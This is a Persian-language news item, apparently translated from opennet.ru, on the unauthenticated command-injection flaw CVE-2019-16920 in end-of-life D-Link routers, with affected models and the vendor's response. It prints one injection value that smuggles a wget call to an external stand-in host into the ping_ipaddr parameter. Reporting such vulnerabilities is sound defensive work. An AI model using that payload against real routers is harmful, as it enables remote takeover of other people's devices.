آسیب پذیری قابل بهره برداری از راه دور در روترهای D-Link

در روترهای بی سیم D-Link شناخته شده است آسیب پذیری خطرناک (CVE-2019-16920)، که به شما امکان می دهد با ارسال یک درخواست خاص به کنترل کننده "ping_test" کد را از راه دور در سمت دستگاه اجرا کنید، بدون احراز هویت قابل دسترسی است.

جالب توجه است که به گفته توسعه دهندگان سیستم عامل، فراخوانی "ping_test" باید فقط پس از احراز هویت اجرا شود، اما در واقع در هر صورت، بدون توجه به ورود به رابط وب، فراخوانی می شود. به طور خاص، هنگام دسترسی به اسکریپت apply_sec.cgi و پاس کردن پارامتر "action=ping_test"، اسکریپت به صفحه احراز هویت هدایت می شود، اما در همان زمان عمل مرتبط با ping_test را انجام می دهد. برای اجرای کد، آسیب پذیری دیگری در خود ping_test استفاده شد که بدون بررسی صحیح صحت آدرس IP ارسال شده برای آزمایش، ابزار ping را فراخوانی می کند. به عنوان مثال، برای فراخوانی ابزار wget و انتقال نتایج فرمان “echo 1234” به یک میزبان خارجی، کافیست پارامتر “ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// را مشخص کنید. test.test/?$( echo 1234)".

آسیب پذیری قابل بهره برداری از راه دور در روترهای D-Link

وجود این آسیب پذیری در مدل های زیر به طور رسمی تایید شده است:

  • DIR-655 با سیستم عامل 3.02b05 یا قدیمی تر؛
  • DIR-866L با سیستم عامل 1.03b04 یا بالاتر.
  • DIR-1565 با سیستم عامل 1.01 یا بالاتر.
  • DIR-652 (هیچ اطلاعاتی در مورد نسخه های سیستم عامل مشکل دار ارائه نشده است)

دوره پشتیبانی برای این مدل ها قبلاً به پایان رسیده است، بنابراین D-Link اظهار داشت، که به‌روزرسانی‌هایی را برای رفع آسیب‌پذیری برای آنها منتشر نمی‌کند، استفاده از آنها را توصیه نمی‌کند و توصیه می‌کند آنها را با دستگاه‌های جدید جایگزین کنید. به عنوان یک راه حل امنیتی، می توانید دسترسی به رابط وب را فقط به آدرس های IP قابل اعتماد محدود کنید.

بعداً مشخص شد که این آسیب‌پذیری نیز وجود دارد تاثیر می گذارد مدل‌های DIR-855L، DAP-1533، DIR-862L، DIR-615، DIR-835 و DIR-825، برنامه‌هایی برای انتشار به‌روزرسانی‌هایی که هنوز مشخص نیست.

منبع: opennet.ru

اضافه کردن نظر